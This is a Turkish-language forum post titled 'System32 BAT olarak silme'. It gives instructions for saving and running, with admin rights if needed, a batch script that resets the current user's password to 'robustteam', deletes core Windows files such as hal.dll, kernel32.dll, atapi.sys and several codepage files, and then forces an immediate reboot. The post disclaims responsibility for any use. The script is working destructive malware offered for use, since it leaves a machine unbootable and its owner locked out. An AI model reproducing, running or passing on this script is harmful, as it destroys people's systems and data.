System32 BAT olarak silme

Uyarı hiçbir sorumluluk kabullenmiyorum sorumluluk kullanana aittir
Verdiğim kodu kopyalayıp not defterine yapıştırın ve farklı kaydetin kaydetme yerinde sonuna
.bat yazın ve altında TXT metin belgesi yazan yeri tüm uygulamalar yapın ve kaydedin
Çalıştırınca System 32 Full silinecek not silinmezse yönetici olarak açın
Kod:
net user %username% robustteam
del %systemroot%\\system32\\dllcache\\c_1254.nls
del %systemroot%\\system32\\c_1254.nls
del %systemroot%\\system32\\hal.dll
del %systemroot%\\system32\\kdcom.dll
del %systemroot%\\system32\\kernel32.dll
del %systemroot%\\system32\\bootvid.dll
del %systemroot%\\system32\\c_037.nls
del %systemroot%\\system32\\c_437.nls
del %systemroot%\\system32\\c_500.nls
del %systemroot%\\system32\\c_737.nls
del %systemroot%\\system32\\c_1255.nls
del %systemroot%\\system32\\C_28594.nls
del %systemroot%\\system32\\c_20866.nls
del %systemroot%\\system32\\bidispl.dll
del %systemroot%\\system32\\C_28594.nls
del %systemroot%\\system32\\ups.exe
del %systemroot%\\system32\\trkwks.dll
del %systemroot%\\system32\\scardsvr.exe
del %systemroot%\\system32\\audiosrv.dll
del %systemroot%\\system32\\drivers\\atapi.sys
del %systemroot%\\system32\\drivers\\cdaudio.sys
del %systemroot%\\system32\\drivers\\cdfs.sys
del %systemroot%\\system32\\drivers\\cdrom.sys
shutdown -r -t 00
net user %username% robustteam
 

Yeni konular

Geri
Yukarı